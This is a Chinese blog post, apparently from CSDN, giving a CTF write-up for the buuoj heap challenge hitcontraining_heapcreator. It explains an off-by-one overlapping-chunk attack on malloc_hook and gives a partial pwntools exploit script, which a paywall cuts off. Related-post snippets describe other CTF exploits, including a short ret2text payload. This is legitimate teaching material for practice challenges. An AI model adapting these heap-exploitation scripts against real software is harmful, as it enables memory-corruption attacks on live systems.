buuoj Pwn writeup 71-75

最新推荐文章于 2023-05-23 20:23:05 发布
原创 最新推荐文章于 2023-05-23 20:23:05 发布 · 383 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全

71 hitcontraining_heapcreator

保护

在这里插入图片描述菜单
在这里插入图片描述功能还是很齐全的,题目应该不难。

create
在这里插入图片描述结构简单。

在这里插入图片描述

edit
在这里插入图片描述read_input那里有off by one。

show
在这里插入图片描述

delete

在这里插入图片描述平平无奇输出删除。

那我们就是常规思路,通过off by one,制造overlapping,然后泄露地址,malloc_hook一套给它带走。

首先我们想的是通过off by one,申请4个0x71大小的chunk,将第一个chunk的size改成0xe1,然后free掉,从而制造overlapping,我们再将第一个申请回来,然后地址就会中第二个chunk中,就可以释放地址。顺路把第二个的chunkfd改成malloc - 0x8的位置,然后申请回来,编辑就好了。

但是要注意的是因为里面create一次会创建两个chunk,大小也不一样,所以我们要先申请并且释放一些0x10的chunk,来让后面那些0x70的chunk是在一起的,方便溢出。

exp

# -*- coding: utf-8 -*-
from pwn import *

#r = remote('node3.buuoj.cn',25794)
r = process('./71')

context.log_level = "debug"

elf = ELF('./71')
libc = ELF('./64/libc-2.23.so')
#libc = ELF('/home/wuangwuang/glibc-all-in-one-master/glibc-all-in-one-master/libs/2.23-0ubuntu11.2_amd64/libc.so.6')
one_gadget = 0x4526a

def create(size, content):
    r.sendlineafter("Your choice :", "1")
    r.sendlineafter("Size of Heap : ", str(size))
    r.sendlineafter("Content of heap:", content)

def edit(index, content):
    r.sendlineafter("Your choice :", "2")
    r.sendlineafter("Index :", str(index))
    r.sendlineafter("Content of heap : ", content)

def show(index):
    r.sendlineafter("Your choice :", "3")
    r.sendlineafter("Index :", str(index))

def delete(index):
    r.sendlineafter("Your choice :", "4")
    r.sendlineafter("Index :", str(index))

create(0x18, '0000') #0
create(0x18, '0000') #1
create(0x18, '0000') #2
delete(0)
delete(1)
delete(2)

create(0x68, 'aaaa'
最低0.47元/天 解锁文章
buuoj Pwn writeup 81-85
yongbaoii的博客
02-26 300
81 pwnable_hacknote 保护 菜单堆 add 申请好的结构是下面这样的。 delete 没有清理干净,uaf。 print 直接调用那个puts函数,那直接想到如果把它改成system,content里面改成’/bin/sh’,这不就好了嘛? 先申请一个0x8的,再申请0x100的,再全部释放掉,就会导致fastbin里面会有三个chunk,再申请0x8,就可以对chunk0的第一层chunk进行任意写。 因为uaf,导致我们还是能使用print函数,但是print的那个chunk被清
buuoj、xmctf、攻防世界刷题(web)write up
热门推荐
Love&Share
06-14 1万+
BUUOJ-每天两道,告别烦恼 WEB: [GXYCTF2019]BabySQli 输入用户名admin,发现可以登入,其他显示wrong user 源码中发现,存在base编码 先base32再base64解码,发现sql语句尝试去注入 首先尝试万能密码: 发现被拦截 尝试手工注入: 一个联合注入新知识 在联合查询并不存在的数据时,联合查询就会构造一个虚拟的数据。 下面是一个自己的本地环境 数据库原本这几个用户名和密码 执行select * from flag WHERE username
buuoj helloword writeup
m0_73605862的博客
05-18 296
Step2:在com.example.helloworld文件目录下的smail下的com下的example下的helloword里面有MainActivity文件,点击进去发现flag。Step1:apk是安卓程序的后缀,所以这道题要用安卓的逆向工具apkIDE改之理,将程序用apkIDE打开。【来源】(buuoj)https://buuoj.cn/challenges#helloword。【思路】用apkide进行逆向分析。【题目】helloword。【题型】Reverse。
buuoj Pwn writeup 96-100
yongbaoii的博客
03-08 388
96 mrctf2020_easy_equation 保护 97 ciscn_2019_final_2 保护 98 ciscn_2019_s_9 保护 99 gyctf_2020_force 保护 100 [极客大挑战 2019]Not Bad 保护
buuoj Pwn writeup 86-90
yongbaoii的博客
03-08 309
86 axb_2019_brop64 保护 花里胡哨的。 平平无奇栈溢出。 from pwn import * context.log_level="debug" r = remote('node3.buuoj.cn',29649) elf = ELF('./86') libc = ELF("./64/libc-2.23.so") main=0x4007d6 puts_plt=elf.plt['puts'] puts_got=elf.got['puts'] pop_rdi=0x400963 r.r
buuoj Pwn writeup 66-70
yongbaoii的博客
02-23 358
66 ciscn_2019_final_3 保护 67 mrctf2020_shellcode 保护 68 hitcontraining_magicheap 保护 69 pwnable_start 保护 70 wustctf2020_getshell_2 保护
buuoj Pwn writeup 51-55
yongbaoii的博客
02-16 335
51 cmcc_simplerop 保护 52 pwnable_orw 保护 53 jarvisoj_level1 保护 54 roarctf_2019_easy_pwn 保护 这个全绿有点厉害。 55 picoctf_2018_buffer overflow 2 保护
buuoj Pwn writeup 21-30
yongbaoii的博客
02-05 1327
21 ciscn_2019_ne_5 保护 这个地方的strcpy函数,一看就估摸着有问题。 他把src那块的东西复制到了dest 但是你会发现 dest那里 0x48 但是你是可以往src那里输入东西的。 一口气能输128个字节,那这就造成了溢出。 那再说怎么利用 这个地方首先要注意他这里没有/bin/sh,但是有sh 而且还非常隐蔽 所以呢咱们这边推荐之后/bin/sh跟sh的搜索都用ROPgadget。 非常的nice 然后程序里面本来就有system函数,然后就一把梭。 exp from p
buuoj Pwn writeup 31-40
yongbaoii的博客
02-06 1508
31 [Black Watch 入群题]PWN 这个题有问题,就给了个附件,给的链接nc都连不上,做做题算了。 保护 可以往bss上写东西,然后有个溢出,但是溢出有限,只能覆盖到返回地址。 因为开了NX,所以不能写shellcode,因为溢出有限,所以先想到的是栈迁移。 把栈迁移到bss上,构造ROP,通过write函数泄露libc地址,然后就在bss上一把梭。 写法很多,我这里的话就直接先把’/bin/sh\x00’先写在了bss的位置。 exp from pwn import* from LibcSea
buuoj Pwn writeup 56-60
yongbaoii的博客
02-16 290
56 wustctf2020_getshell 保护 57 [V&N2020 公开赛]easyTHeap 保护 58 xdctf2015_pwn200 保护 59 ciscn_2019_n_3 保护 60 bbys_tu_2016 保护
buuoj Pwn writeup 146-150
yongbaoii的博客
05-28 291
146 SWPUCTF_2019_login 147 qctf2018_stack2 148 lctf2016_pwn200 149 sctf_2019_easy_heap 150 ciscn_2019_s_1
buuoj Pwn writeup 76-80
yongbaoii的博客
02-24 494
76 0ctf_2017_babyheap 保护 菜单堆。 allocate 堆的结构很明显了。要注意的是flag是四个字节。 fill 又是输入大小可以随便写。 又可以溢出。 free free的还是很干净的。 dump 平平无奇输出函数。 那么我们首先要考虑泄露libc的地址。泄露地址的方法只能去考虑unsorted bin,因为有溢出,可以完全仿照off by one,来制造overlapping,然后泄露地址啊,攻击malloc_hook,就下来了。 先来申请四个chunk。然后通过栈溢出改变c
buuoj Pwn writeup 196-200
yongbaoii的博客
06-12 482
196 gyctf_2020_bfnote 第一个漏洞点是有栈溢出,但是开了canary。第二个漏洞点是虽然会检测v4大小,但是检测完时候我们还能再次输入,所以我们会有一次任意输入的机会。 我们的想法就是改掉TLS结构体中的canary,然后rop即可。 tls结构体 typedef struct { void *tcb; /* Pointer to the TCB. Not necessarily the thread descriptor u
buuoj Pwn writeup 91-95
yongbaoii的博客
03-08 502
91 gyctf_2020_some_thing_exceting bnanana。 create 这是他整体的一个结构。 但是要注意的是它对申请!的chunk有要求,只能是fastbin大小的chunk。 modify 没啥用。 delete 还是没清理干净。 view函数 这里还有一个可以利用的函数。 那么这道题能够利用的就是一个uaf,还有他把flag写在了bss上面。有uaf就会有double free,那么我们可以考虑去把s通过fastbin_attack,申请回来,然后进行泄露flag。
buuoj Pwn writeup 61-65
yongbaoii的博客
02-16 320
61 gyctf_2020_borrowstack 保护 62 inndy_rop 保护 平平无奇栈溢出。 又是要么int 80h exp 要么mprotect。 exp 63 [V&N2020 公开赛]warmup 保护 64 axb_2019_fmt32 保护 65 others_babystack 保护
buuoj Pwn writeup 101-105
yongbaoii的博客
03-08 311
101 inndy_echo 保护 就格式化字符串漏洞。 102 cmcc_pwnme1 保护 103 oneshot_tjctf_2016 保护 RELRO一点没开的…… 104 picoctf_2018_leak_me 保护 105 x_ctf_b0verfl0w 保护
buuoj Pwn writeup 106-110
yongbaoii的博客
03-08 406
106 zctf2016_note2 保护 107 suctf_2018_basic pwn 保护 ret2text? exp from pwn import * context.log_level='debug' r = remote('node3.buuoj.cn',29514) flag_addr = 0x401157 payload = 'a' * 0x118 + p64(flag_addr) r.sendline(payload) r.interactive() 108 wdb_201
buuoj 小明的保险箱 writeup
m0_73605862的博客
05-23 394
【来源】(buuoj)https://buuoj.cn/challenges#%E5%B0%8F%E6%98%8E%E7%9A%84%E4%BF%9D%E9%99%A9%E7%AE%B1。step3:根据题目提示是4位的纯数字所以是,选择所有数字,暴力破解,最大的长度和最小的长度都选择4,开始破解。得到一个rar文件夹。Step1:打开文件发现是一个图片,然后根据题目意思是有一个隐藏文件。【思路】得到隐藏文件并且暴力破解密码。Step4:得到密码,得到flag。【题目】小明的保险箱。
buuoj Pwn writeup 151-155
yongbaoii的博客
05-28 451
151 ciscn_2019_sw_1 保护 要注意到的是RELRO一点没开,这意味着.fini_array是可以覆盖的。 栈上的格式化字符串。 system也有了。 printf只能用一次,但是我们前面说.fini_array可以覆盖,所以我们第一次先覆盖它为main,制造循环,然后劫持scanf的got表,进行利用就好。 要注意的是在我们覆盖.fini_array的意思是在返回的时候以此调用里面的函数,而这个题.fini_array数组只有一个数组,所以我们只能通过它来返回一次main函数,所以我们一
PWN G21.5-0.9脉冲星云光谱分析结果发布
在天文学领域,脉冲星云(Pulsar Wind Nebula,简称PWN)是一种特别的天体现象,它是由高速旋转的脉冲星释放出的粒子风与周围介质相互作用形成的高能辐射云。脉冲星是中子星的一种,它们自转极快,能够周期性地发出...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值